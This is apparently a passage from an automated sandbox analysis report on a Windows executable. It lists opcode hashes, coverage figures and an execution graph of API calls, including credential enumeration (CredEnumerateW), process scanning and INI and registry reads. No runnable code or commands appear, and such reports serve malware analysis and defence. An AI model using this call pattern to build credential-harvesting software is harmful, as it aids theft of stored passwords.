                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                                                                                                                                  • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:6.3%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:79
                                                                                                                                                                                                                                  execution_graph 40323 441819 40326 430737 40323->40326 40325 441825 40327 430756 40326->40327 40339 43076d 40326->40339 40328 430774 40327->40328 40329 43075f 40327->40329 40340 43034a 40328->40340 40351 4169a7 11 API calls 40329->40351 40332 4307ce 40333 430819 memset 40332->40333 40344 415b2c 40332->40344 40333->40339 40334 43077e 40334->40332 40337 4307fa 40334->40337 40334->40339 40336 4307e9 40336->40333 40336->40339 40352 4169a7 11 API calls 40337->40352 40339->40325 40341 430359 40340->40341 40342 43034e 40340->40342 40341->40334 40353 415c23 memcpy 40342->40353 40345 415b46 40344->40345 40346 415b42 40344->40346 40345->40336 40346->40345 40347 415b94 40346->40347 40348 415b5a 40346->40348 40349 4438b5 10 API calls 40347->40349 40348->40345 40350 415b79 memcpy 40348->40350 40349->40345 40350->40345 40351->40339 40352->40339 40353->40341 37670 442ec6 19 API calls 37844 4152c6 malloc 37845 4152e2 37844->37845 37846 4152ef 37844->37846 37848 416760 11 API calls 37846->37848 37848->37845 37849 4466f4 37868 446904 37849->37868 37851 446700 GetModuleHandleA 37854 446710 __set_app_type __p__fmode __p__commode 37851->37854 37853 4467a4 37855 4467ac __setusermatherr 37853->37855 37856 4467b8 37853->37856 37854->37853 37855->37856 37869 4468f0 _controlfp 37856->37869 37858 4467bd _initterm __wgetmainargs _initterm 37860 44681e GetStartupInfoW 37858->37860 37861 446810 37858->37861 37862 446866 GetModuleHandleA 37860->37862 37870 41276d 37862->37870 37866 446896 exit 37867 44689d _cexit 37866->37867 37867->37861 37868->37851 37869->37858 37871 41277d 37870->37871 37913 4044a4 LoadLibraryW 37871->37913 37873 412785 37904 412789 37873->37904 37921 414b81 37873->37921 37876 4127c8 37927 412465 memset ??2@YAPAXI 37876->37927 37878 4127ea 37939 40ac21 37878->37939 37883 412813 37957 40dd07 memset 37883->37957 37884 412827 37962 40db69 memset 37884->37962 37888 412822 37983 4125b6 ??3@YAXPAX 37888->37983 37889 40ada2 _wcsicmp 37890 41283d 37889->37890 37890->37888 37893 412863 CoInitialize 37890->37893 37967 41268e 37890->37967 37987 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37893->37987 37897 41296f 37989 40b633 37897->37989 37899 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37905 412957 CoUninitialize 37899->37905 37910 4128ca 37899->37910 37904->37866 37904->37867 37905->37888 37906 4128d0 TranslateAcceleratorW 37907 412941 GetMessageW 37906->37907 37906->37910 37907->37905 37907->37906 37908 412909 IsDialogMessageW 37908->37907 37908->37910 37909 4128fd IsDialogMessageW 37909->37907 37909->37908 37910->37906 37910->37908 37910->37909 37911 41292b TranslateMessage DispatchMessageW 37910->37911 37912 41291f IsDialogMessageW 37910->37912 37911->37907 37912->37907 37912->37911 37914 4044cf GetProcAddress 37913->37914 37917 4044f7 37913->37917 37915 4044e8 FreeLibrary 37914->37915 37918 4044df 37914->37918 37916 4044f3 37915->37916 37915->37917 37916->37917 37919 404507 MessageBoxW 37917->37919 37920 40451e 37917->37920 37918->37915 37919->37873 37920->37873 37922 414b8a 37921->37922 37923 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37921->37923 37993 40a804 memset 37922->37993 37923->37876 37926 414b9e GetProcAddress 37926->37923 37928 4124e0 37927->37928 37929 412505 ??2@YAPAXI 37928->37929 37930 41251c 37929->37930 37932 412521 37929->37932 38015 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37930->38015 38004 444722 37932->38004 37938 41259b wcscpy 37938->37878 38020 40b1ab free free 37939->38020 37943 40a9ce malloc memcpy free free 37950 40ac5c 37943->37950 37944 40ad4b 37952 40ad76 37944->37952 38044 40a9ce 37944->38044 37946 40ace7 free 37946->37950 37950->37943 37950->37944 37950->37946 37950->37952 38024 40a8d0 37950->38024 38036 4099f4 37950->38036 37951 40a8d0 7 API calls 37951->37952 38021 40aa04 37952->38021 37953 40ada2 37954 40adc9 37953->37954 37955 40adaa 37953->37955 37954->37883 37954->37884 37955->37954 37956 40adb3 _wcsicmp 37955->37956 37956->37954 37956->37955 38049 40dce0 37957->38049 37959 40dd3a GetModuleHandleW 38054 40dba7 37959->38054 37963 40dce0 3 API calls 37962->37963 37964 40db99 37963->37964 38126 40dae1 37964->38126 38140 402f3a 37967->38140 37969 412766 37969->37888 37969->37893 37970 4126d3 _wcsicmp 37971 4126a8 37970->37971 37971->37969 37971->37970 37973 41270a 37971->37973 38174 4125f8 7 API calls 37971->38174 37973->37969 38143 411ac5 37973->38143 37984 4125da 37983->37984 37985 4125f0 37984->37985 37986 4125e6 DeleteObject 37984->37986 37988 40b1ab free free 37985->37988 37986->37985 37987->37899 37988->37897 37990 40b640 37989->37990 37991 40b639 free 37989->37991 37992 40b1ab free free 37990->37992 37991->37990 37992->37904 37994 40a83b GetSystemDirectoryW 37993->37994 37995 40a84c wcscpy 37993->37995 37994->37995 38000 409719 wcslen 37995->38000 37998 40a881 LoadLibraryW 37999 40a886 37998->37999 37999->37923 37999->37926 38001 409724 38000->38001 38002 409739 wcscat LoadLibraryW 38000->38002 38001->38002 38003 40972c wcscat 38001->38003 38002->37998 38002->37999 38003->38002 38005 444732 38004->38005 38006 444728 DeleteObject 38004->38006 38016 409cc3 38005->38016 38006->38005 38008 412551 38009 4010f9 38008->38009 38010 401130 38009->38010 38011 401134 GetModuleHandleW LoadIconW 38010->38011 38012 401107 wcsncat 38010->38012 38013 40a7be 38011->38013 38012->38010 38014 40a7d2 38013->38014 38014->37938 38014->38014 38015->37932 38019 409bfd memset wcscpy 38016->38019 38018 409cdb CreateFontIndirectW 38018->38008 38019->38018 38020->37950 38022 40aa14 38021->38022 38023 40aa0a free 38021->38023 38022->37953 38023->38022 38025 40a8eb 38024->38025 38026 40a8df wcslen 38024->38026 38027 40a906 free 38025->38027 38028 40a90f 38025->38028 38026->38025 38029 40a919 38027->38029 38030 4099f4 3 API calls 38028->38030 38031 40a932 38029->38031 38032 40a929 free 38029->38032 38030->38029 38034 4099f4 3 API calls 38031->38034 38033 40a93e memcpy 38032->38033 38033->37950 38035 40a93d 38034->38035 38035->38033 38037 409a41 38036->38037 38038 4099fb malloc 38036->38038 38037->37950 38040 409a37 38038->38040 38041 409a1c 38038->38041 38040->37950 38042 409a30 free 38041->38042 38043 409a20 memcpy 38041->38043 38042->38040 38043->38042 38045 40a9e7 38044->38045 38046 40a9dc free 38044->38046 38048 4099f4 3 API calls 38045->38048 38047 40a9f2 38046->38047 38047->37951 38048->38047 38073 409bca GetModuleFileNameW 38049->38073 38051 40dce6 wcsrchr 38052 40dcf5 38051->38052 38053 40dcf9 wcscat 38051->38053 38052->38053 38053->37959 38074 44db70 38054->38074 38058 40dbfd 38077 4447d9 38058->38077 38061 40dc34 wcscpy wcscpy 38103 40d6f5 38061->38103 38062 40dc1f wcscpy 38062->38061 38065 40d6f5 3 API calls 38066 40dc73 38065->38066 38067 40d6f5 3 API calls 38066->38067 38068 40dc89 38067->38068 38069 40d6f5 3 API calls 38068->38069 38070 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38069->38070 38109 40da80 38070->38109 38073->38051 38075 40dbb4 memset memset 38074->38075 38076 409bca GetModuleFileNameW 38075->38076 38076->38058 38079 4447f4 38077->38079 38078 40dc1b 38078->38061 38078->38062 38079->38078 38080 444807 ??2@YAPAXI 38079->38080 38081 44481f 38080->38081 38082 444873 _snwprintf 38081->38082 38083 4448ab wcscpy 38081->38083 38116 44474a 8 API calls 38082->38116 38085 4448bb 38083->38085 38117 44474a 8 API calls 38085->38117 38086 4448a7 38086->38083 38086->38085 38088 4448cd 38118 44474a 8 API calls 38088->38118 38090 4448e2 38119 44474a 8 API calls 38090->38119 38092 4448f7 38120 44474a 8 API calls 38092->38120 38094 44490c 38121 44474a 8 API calls 38094->38121 38096 444921 38122 44474a 8 API calls 38096->38122 38098 444936 38123 44474a 8 API calls 38098->38123 38100 44494b 38124 44474a 8 API calls 38100->38124 38102 444960 ??3@YAXPAX 38102->38078 38104 44db70 38103->38104 38105 40d702 memset GetPrivateProfileStringW 38104->38105 38106 40d752 38105->38106 38107 40d75c WritePrivateProfileStringW 38105->38107 38106->38107 38108 40d758 38106->38108 38107->38108 38108->38065 38110 44db70 38109->38110 38111 40da8d memset 38110->38111 38112 40daac LoadStringW 38111->38112 38113 40dac6 38112->38113 38113->38112 38115 40dade 38113->38115 38125 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38113->38125 38115->37888 38116->38086 38117->38088 38118->38090 38119->38092 38120->38094 38121->38096 38122->38098 38123->38100 38124->38102 38125->38113 38136 409b98 GetFileAttributesW 38126->38136 38128 40daea 38129 40db63 38128->38129 38130 40daef wcscpy wcscpy GetPrivateProfileIntW 38128->38130 38129->37889 38137 40d65d GetPrivateProfileStringW 38130->38137 38132 40db3e 38138 40d65d GetPrivateProfileStringW 38132->38138 38134 40db4f 38139 40d65d GetPrivateProfileStringW 38134->38139 38136->38128 38137->38132 38138->38134 38139->38129 38175 40eaff 38140->38175 38144 411ae2 memset 38143->38144 38145 411b8f 38143->38145 38215 409bca GetModuleFileNameW 38144->38215 38157 411a8b 38145->38157 38147 411b0a wcsrchr 38148 411b22 wcscat 38147->38148 38149 411b1f 38147->38149 38216 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38148->38216 38149->38148 38151 411b67 38217 402afb 38151->38217 38155 411b7f 38273 40ea13 SendMessageW memset SendMessageW 38155->38273 38158 402afb 27 API calls 38157->38158 38159 411ac0 38158->38159 38160 4110dc 38159->38160 38161 41113e 38160->38161 38166 4110f0 38160->38166 38298 40969c LoadCursorW SetCursor 38161->38298 38163 411143 38299 4032b4 38163->38299 38317 444a54 38163->38317 38164 4110f7 _wcsicmp 38164->38166 38165 411157 38167 40ada2 _wcsicmp 38165->38167 38166->38161 38166->38164 38320 410c46 10 API calls 38166->38320 38170 411167 38167->38170 38168 4111af 38170->38168 38171 4111a6 qsort 38170->38171 38171->38168 38174->37971 38176 40eb10 38175->38176 38188 40e8e0 38176->38188 38179 40eb6c memcpy memcpy 38180 40ebb7 38179->38180 38180->38179 38181 40ebf2 ??2@YAPAXI ??2@YAPAXI 38180->38181 38184 40d134 16 API calls 38180->38184 38182 40ec2e ??2@YAPAXI 38181->38182 38185 40ec65 38181->38185 38182->38185 38184->38180 38185->38185 38198 40ea7f 38185->38198 38187 402f49 38187->37971 38189 40e8f2 38188->38189 38190 40e8eb ??3@YAXPAX 38188->38190 38191 40e900 38189->38191 38192 40e8f9 ??3@YAXPAX 38189->38192 38190->38189 38193 40e911 38191->38193 38194 40e90a ??3@YAXPAX 38191->38194 38192->38191 38195 40e931 ??2@YAPAXI ??2@YAPAXI 38193->38195 38196 40e921 ??3@YAXPAX 38193->38196 38197 40e92a ??3@YAXPAX 38193->38197 38194->38193 38195->38179 38196->38197 38197->38195 38199 40aa04 free 38198->38199 38200 40ea88 38199->38200 38201 40aa04 free 38200->38201 38202 40ea90 38201->38202 38203 40aa04 free 38202->38203 38204 40ea98 38203->38204 38205 40aa04 free 38204->38205 38206 40eaa0 38205->38206 38207 40a9ce 4 API calls 38206->38207 38208 40eab3 38207->38208 38209 40a9ce 4 API calls 38208->38209 38210 40eabd 38209->38210 38211 40a9ce 4 API calls 38210->38211 38212 40eac7 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40ead1 38213->38214 38214->38187 38215->38147 38216->38151 38274 40b2cc 38217->38274 38219 402b0a 38220 40b2cc 27 API calls 38219->38220 38221 402b23 38220->38221 38222 40b2cc 27 API calls 38221->38222 38223 402b3a 38222->38223 38224 40b2cc 27 API calls 38223->38224 38225 402b54 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402b6b 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b82 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b99 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402bb0 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402bc7 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402bde 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bf5 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402c0c 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402c23 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c3a 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c51 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c68 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c7f 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c99 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402cb3 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402cd5 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402cf0 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402d0b 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402d26 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402d3e 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d59 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d78 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d93 38270->38271 38272 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38271->38272 38272->38155 38273->38145 38277 40b58d 38274->38277 38276 40b2d1 38276->38219 38278 40b5a4 GetModuleHandleW FindResourceW 38277->38278 38279 40b62e 38277->38279 38280 40b5c2 LoadResource 38278->38280 38282 40b5e7 38278->38282 38279->38276 38281 40b5d0 SizeofResource LockResource 38280->38281 38280->38282 38281->38282 38282->38279 38290 40afcf 38282->38290 38284 40b608 memcpy 38293 40b4d3 memcpy 38284->38293 38286 40b61e 38294 40b3c1 18 API calls 38286->38294 38288 40b626 38295 40b04b 38288->38295 38291 40b04b ??3@YAXPAX 38290->38291 38292 40afd7 ??2@YAPAXI 38291->38292 38292->38284 38293->38286 38294->38288 38296 40b051 ??3@YAXPAX 38295->38296 38297 40b05f 38295->38297 38296->38297 38297->38279 38298->38163 38300 4032c4 38299->38300 38301 40b633 free 38300->38301 38302 403316 38301->38302 38321 44553b 38302->38321 38306 403480 38519 40368c 15 API calls 38306->38519 38308 403489 38309 40b633 free 38308->38309 38310 403495 38309->38310 38310->38165 38311 4033a9 memset memcpy 38312 4033ec wcscmp 38311->38312 38313 40333c 38311->38313 38312->38313 38313->38306 38313->38311 38313->38312 38517 4028e7 11 API calls 38313->38517 38518 40f508 6 API calls 38313->38518 38315 403421 _wcsicmp 38315->38313 38318 444a64 FreeLibrary 38317->38318 38319 444a83 38317->38319 38318->38319 38319->38165 38320->38166 38322 445548 38321->38322 38323 445599 38322->38323 38520 40c768 38322->38520 38324 4455a8 memset 38323->38324 38331 4457f2 38323->38331 38603 403988 38324->38603 38335 445854 38331->38335 38706 403e2d memset memset memset memset memset 38331->38706 38332 445672 38614 403fbe memset memset memset memset memset 38332->38614 38333 4458bb memset memset 38340 414c2e 16 API calls 38333->38340 38386 4458aa 38335->38386 38729 403c9c memset memset memset memset memset 38335->38729 38336 44557a 38383 44558c 38336->38383 38801 4136c0 CoTaskMemFree 38336->38801 38338 44595e memset memset 38345 414c2e 16 API calls 38338->38345 38339 4455e5 38339->38332 38348 44560f 38339->38348 38341 4458f9 38340->38341 38346 40b2cc 27 API calls 38341->38346 38343 445a00 memset memset 38752 414c2e 38343->38752 38344 445b22 38350 445bca 38344->38350 38351 445b38 memset memset memset 38344->38351 38355 44599c 38345->38355 38356 445909 38346->38356 38360 4087b3 338 API calls 38348->38360 38349 445849 38817 40b1ab free free 38349->38817 38357 445c8b memset memset 38350->38357 38425 445cf0 38350->38425 38361 445bd4 38351->38361 38362 445b98 38351->38362 38365 40b2cc 27 API calls 38355->38365 38366 409d1f 6 API calls 38356->38366 38369 414c2e 16 API calls 38357->38369 38358 445585 38802 41366b FreeLibrary 38358->38802 38359 44589f 38818 40b1ab free free 38359->38818 38367 445621 38360->38367 38375 414c2e 16 API calls 38361->38375 38362->38361 38371 445ba2 38362->38371 38368 4459ac 38365->38368 38379 445919 38366->38379 38803 4454bf 20 API calls 38367->38803 38381 409d1f 6 API calls 38368->38381 38382 445cc9 38369->38382 38890 4099c6 wcslen 38371->38890 38372 4456b2 38805 40b1ab free free 38372->38805 38374 40b2cc 27 API calls 38387 445a4f 38374->38387 38389 445be2 38375->38389 38376 403335 38516 4452e5 45 API calls 38376->38516 38377 445d3d 38409 40b2cc 27 API calls 38377->38409 38378 445d88 memset memset memset 38392 414c2e 16 API calls 38378->38392 38819 409b98 GetFileAttributesW 38379->38819 38380 445823 38380->38349 38391 4087b3 338 API calls 38380->38391 38393 4459bc 38381->38393 38394 409d1f 6 API calls 38382->38394 38587 444b06 38383->38587 38384 445879 38384->38359 38405 4087b3 338 API calls 38384->38405 38386->38333 38410 44594a 38386->38410 38767 409d1f wcslen wcslen 38387->38767 38398 40b2cc 27 API calls 38389->38398 38391->38380 38402 445dde 38392->38402 38886 409b98 GetFileAttributesW 38393->38886 38404 445ce1 38394->38404 38395 445bb3 38893 445403 memset 38395->38893 38396 445680 38396->38372 38637 4087b3 memset 38396->38637 38399 445bf3 38398->38399 38408 409d1f 6 API calls 38399->38408 38400 445928 38400->38410 38820 40b6ef 38400->38820 38411 40b2cc 27 API calls 38402->38411 38910 409b98 GetFileAttributesW 38404->38910 38405->38384 38419 445c07 38408->38419 38420 445d54 _wcsicmp 38409->38420 38410->38338 38424 4459ed 38410->38424 38423 445def 38411->38423 38412 4459cb 38412->38424 38433 40b6ef 252 API calls 38412->38433 38416 40b2cc 27 API calls 38417 445a94 38416->38417 38772 40ae18 38417->38772 38418 44566d 38418->38331 38688 413d4c 38418->38688 38429 445389 258 API calls 38419->38429 38430 445d71 38420->38430 38495 445d67 38420->38495 38422 445665 38804 40b1ab free free 38422->38804 38431 409d1f 6 API calls 38423->38431 38424->38343 38424->38344 38425->38376 38425->38377 38425->38378 38426 445389 258 API calls 38426->38350 38435 445c17 38429->38435 38911 445093 23 API calls 38430->38911 38438 445e03 38431->38438 38433->38424 38434 4456d8 38440 40b2cc 27 API calls 38434->38440 38441 40b2cc 27 API calls 38435->38441 38437 44563c 38437->38422 38443 4087b3 338 API calls 38437->38443 38912 409b98 GetFileAttributesW 38438->38912 38439 40b6ef 252 API calls 38439->38376 38445 4456e2 38440->38445 38446 445c23 38441->38446 38442 445d83 38442->38376 38443->38437 38806 413fa6 _wcsicmp _wcsicmp 38445->38806 38450 409d1f 6 API calls 38446->38450 38448 445e12 38455 445e6b 38448->38455 38461 40b2cc 27 API calls 38448->38461 38453 445c37 38450->38453 38451 445aa1 38454 445b17 38451->38454 38469 445ab2 memset 38451->38469 38482 409d1f 6 API calls 38451->38482 38779 40add4 38451->38779 38784 445389 38451->38784 38793 40ae51 38451->38793 38452 4456eb 38457 4456fd memset memset memset memset 38452->38457 38458 4457ea 38452->38458 38459 445389 258 API calls 38453->38459 38887 40aebe 38454->38887 38914 445093 23 API calls 38455->38914 38807 409c70 wcscpy wcsrchr 38457->38807 38810 413d29 38458->38810 38464 445c47 38459->38464 38465 445e33 38461->38465 38471 40b2cc 27 API calls 38464->38471 38472 409d1f 6 API calls 38465->38472 38467 445e7e 38468 445f67 38467->38468 38477 40b2cc 27 API calls 38468->38477 38473 40b2cc 27 API calls 38469->38473 38475 445c53 38471->38475 38476 445e47 38472->38476 38473->38451 38474 409c70 2 API calls 38478 44577e 38474->38478 38479 409d1f 6 API calls 38475->38479 38913 409b98 GetFileAttributesW 38476->38913 38481 445f73 38477->38481 38483 409c70 2 API calls 38478->38483 38484 445c67 38479->38484 38486 409d1f 6 API calls 38481->38486 38482->38451 38487 44578d 38483->38487 38488 445389 258 API calls 38484->38488 38485 445e56 38485->38455 38491 445e83 memset 38485->38491 38489 445f87 38486->38489 38487->38458 38494 40b2cc 27 API calls 38487->38494 38488->38350 38917 409b98 GetFileAttributesW 38489->38917 38493 40b2cc 27 API calls 38491->38493 38496 445eab 38493->38496 38497 4457a8 38494->38497 38495->38376 38495->38439 38498 409d1f 6 API calls 38496->38498 38499 409d1f 6 API calls 38497->38499 38500 445ebf 38498->38500 38501 4457b8 38499->38501 38502 40ae18 9 API calls 38500->38502 38809 409b98 GetFileAttributesW 38501->38809 38512 445ef5 38502->38512 38504 4457c7 38504->38458 38506 4087b3 338 API calls 38504->38506 38505 40ae51 9 API calls 38505->38512 38506->38458 38507 445f5c 38509 40aebe FindClose 38507->38509 38508 40add4 2 API calls 38508->38512 38509->38468 38510 40b2cc 27 API calls 38510->38512 38511 409d1f 6 API calls 38511->38512 38512->38505 38512->38507 38512->38508 38512->38510 38512->38511 38514 445f3a 38512->38514 38915 409b98 GetFileAttributesW 38512->38915 38916 445093 23 API calls 38514->38916 38516->38313 38517->38315 38518->38313 38519->38308 38521 40c775 38520->38521 38918 40b1ab free free 38521->38918 38523 40c788 38919 40b1ab free free 38523->38919 38525 40c790 38920 40b1ab free free 38525->38920 38527 40c798 38528 40aa04 free 38527->38528 38529 40c7a0 38528->38529 38921 40c274 memset 38529->38921 38534 40a8ab 9 API calls 38535 40c7c3 38534->38535 38536 40a8ab 9 API calls 38535->38536 38537 40c7d0 38536->38537 38950 40c3c3 38537->38950 38541 40c877 38550 40bdb0 38541->38550 38542 40c86c 38992 4053fe 39 API calls 38542->38992 38544 40c7e5 38544->38541 38544->38542 38549 40c634 49 API calls 38544->38549 38975 40a706 38544->38975 38549->38544 39160 404363 38550->39160 38553 40bf5d 39180 40440c 38553->39180 38555 40bdee 38555->38553 38558 40b2cc 27 API calls 38555->38558 38556 40bddf CredEnumerateW 38556->38555 38559 40be02 wcslen 38558->38559 38559->38553 38562 40be1e 38559->38562 38560 40be26 wcsncmp 38560->38562 38562->38553 38562->38560 38564 40be7d memset 38562->38564 38565 40bea7 memcpy 38562->38565 38566 40bf11 wcschr 38562->38566 38567 40b2cc 27 API calls 38562->38567 38569 40bf43 LocalFree 38562->38569 39183 40bd5d 28 API calls 38562->39183 39184 404423 38562->39184 38564->38562 38564->38565 38565->38562 38565->38566 38566->38562 38568 40bef6 _wcsnicmp 38567->38568 38568->38562 38568->38566 38569->38562 38570 4135f7 39197 4135e0 38570->39197 38573 40b2cc 27 API calls 38574 41360d 38573->38574 38575 40a804 8 API calls 38574->38575 38576 413613 38575->38576 38577 41361b 38576->38577 38578 41363e 38576->38578 38579 40b273 27 API calls 38577->38579 38580 4135e0 FreeLibrary 38578->38580 38581 413625 GetProcAddress 38579->38581 38582 413643 38580->38582 38581->38578 38583 413648 38581->38583 38582->38336 38584 413658 38583->38584 38585 4135e0 FreeLibrary 38583->38585 38584->38336 38586 413666 38585->38586 38586->38336 39200 4449b9 38587->39200 38590 444c1f 38590->38323 38591 4449b9 42 API calls 38593 444b4b 38591->38593 38592 444c15 38594 4449b9 42 API calls 38592->38594 38593->38592 39221 444972 GetVersionExW 38593->39221 38594->38590 38596 444b99 memcmp 38601 444b8c 38596->38601 38597 444c0b 39225 444a85 42 API calls 38597->39225 38601->38596 38601->38597 39222 444aa5 42 API calls 38601->39222 39223 40a7a0 GetVersionExW 38601->39223 39224 444a85 42 API calls 38601->39224 38604 40399d 38603->38604 39226 403a16 38604->39226 38606 403a09 39240 40b1ab free free 38606->39240 38608 4039a3 38608->38606 38612 4039f4 38608->38612 39237 40a02c CreateFileW 38608->39237 38609 403a12 wcsrchr 38609->38339 38612->38606 38613 4099c6 2 API calls 38612->38613 38613->38606 38615 414c2e 16 API calls 38614->38615 38616 404048 38615->38616 38617 414c2e 16 API calls 38616->38617 38618 404056 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 404073 38619->38620 38621 409d1f 6 API calls 38620->38621 38622 40408e 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4040a6 38623->38624 38625 403af5 20 API calls 38624->38625 38626 4040ba 38625->38626 38627 403af5 20 API calls 38626->38627 38628 4040cb 38627->38628 39267 40414f memset 38628->39267 38630 404140 39281 40b1ab free free 38630->39281 38632 4040ec memset 38635 4040e0 38632->38635 38633 404148 38633->38396 38634 4099c6 2 API calls 38634->38635 38635->38630 38635->38632 38635->38634 38636 40a8ab 9 API calls 38635->38636 38636->38635 39294 40a6e6 WideCharToMultiByte 38637->39294 38639 4087ed 39295 4095d9 memset 38639->39295 38642 408953 38642->38396 38643 408809 memset memset memset memset memset 38644 40b2cc 27 API calls 38643->38644 38645 4088a1 38644->38645 38646 409d1f 6 API calls 38645->38646 38647 4088b1 38646->38647 38648 40b2cc 27 API calls 38647->38648 38649 4088c0 38648->38649 38650 409d1f 6 API calls 38649->38650 38651 4088d0 38650->38651 38652 40b2cc 27 API calls 38651->38652 38653 4088df 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088ef 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088fe 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 40890e 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 40891d 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 40892d 38662->38663 39314 409b98 GetFileAttributesW 38663->39314 38665 40893e 38666 408943 38665->38666 38667 408958 38665->38667 39315 407fdf 75 API calls 38666->39315 39316 409b98 GetFileAttributesW 38667->39316 38670 408964 38671 408969 38670->38671 38672 40897b 38670->38672 39318 409b98 GetFileAttributesW 38672->39318 38689 40b633 free 38688->38689 38690 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38689->38690 38691 413f00 Process32NextW 38690->38691 38692 413da5 OpenProcess 38691->38692 38693 413f17 CloseHandle 38691->38693 38694 413df3 memset 38692->38694 38697 413eb0 38692->38697 38693->38434 39616 413f27 38694->39616 38696 413ebf free 38696->38697 38697->38691 38697->38696 38698 4099f4 3 API calls 38697->38698 38698->38697 38700 413e37 GetModuleHandleW 38701 413e1f 38700->38701 38702 413e46 GetProcAddress 38700->38702 38701->38700 38703 413e6a QueryFullProcessImageNameW 38701->38703 39621 413959 38701->39621 39637 413ca4 38701->39637 38702->38701 38703->38701 38705 413ea2 CloseHandle 38705->38697 38707 414c2e 16 API calls 38706->38707 38708 403eb7 38707->38708 38709 414c2e 16 API calls 38708->38709 38710 403ec5 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 403ee2 38711->38712 38713 409d1f 6 API calls 38712->38713 38714 403efd 38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403f15 38715->38716 38717 403af5 20 API calls 38716->38717 38718 403f29 38717->38718 38719 403af5 20 API calls 38718->38719 38720 403f3a 38719->38720 38721 40414f 33 API calls 38720->38721 38722 403f4f 38721->38722 38723 403faf 38722->38723 38724 403f5b memset 38722->38724 38727 4099c6 2 API calls 38722->38727 38728 40a8ab 9 API calls 38722->38728 39651 40b1ab free free 38723->39651 38724->38722 38726 403fb7 38726->38380 38727->38722 38728->38722 38730 414c2e 16 API calls 38729->38730 38731 403d26 38730->38731 38732 414c2e 16 API calls 38731->38732 38733 403d34 38732->38733 38734 409d1f 6 API calls 38733->38734 38735 403d51 38734->38735 38736 409d1f 6 API calls 38735->38736 38737 403d6c 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d84 38738->38739 38740 403af5 20 API calls 38739->38740 38741 403d98 38740->38741 38742 403af5 20 API calls 38741->38742 38743 403da9 38742->38743 38744 40414f 33 API calls 38743->38744 38745 403dbe 38744->38745 38746 403e1e 38745->38746 38747 403dca memset 38745->38747 38750 4099c6 2 API calls 38745->38750 38751 40a8ab 9 API calls 38745->38751 39652 40b1ab free free 38746->39652 38747->38745 38749 403e26 38749->38384 38750->38745 38751->38745 38753 414b81 9 API calls 38752->38753 38754 414c40 38753->38754 38755 414c73 memset 38754->38755 39653 409cea 38754->39653 38756 414c94 38755->38756 39656 414592 RegOpenKeyExW 38756->39656 38760 414c64 38760->38374 38761 414cc1 38762 414cf4 wcscpy 38761->38762 39657 414bb0 wcscpy 38761->39657 38762->38760 38764 414cd2 39658 4145ac RegQueryValueExW 38764->39658 38766 414ce9 RegCloseKey 38766->38762 38768 409d62 38767->38768 38769 409d43 wcscpy 38767->38769 38768->38416 38770 409719 2 API calls 38769->38770 38771 409d51 wcscat 38770->38771 38771->38768 38773 40aebe FindClose 38772->38773 38774 40ae21 38773->38774 38775 4099c6 2 API calls 38774->38775 38776 40ae35 38775->38776 38777 409d1f 6 API calls 38776->38777 38778 40ae49 38777->38778 38778->38451 38780 40ade0 38779->38780 38781 40ae0f 38779->38781 38780->38781 38782 40ade7 wcscmp 38780->38782 38781->38451 38782->38781 38783 40adfe wcscmp 38782->38783 38783->38781 38785 40ae18 9 API calls 38784->38785 38791 4453c4 38785->38791 38786 40ae51 9 API calls 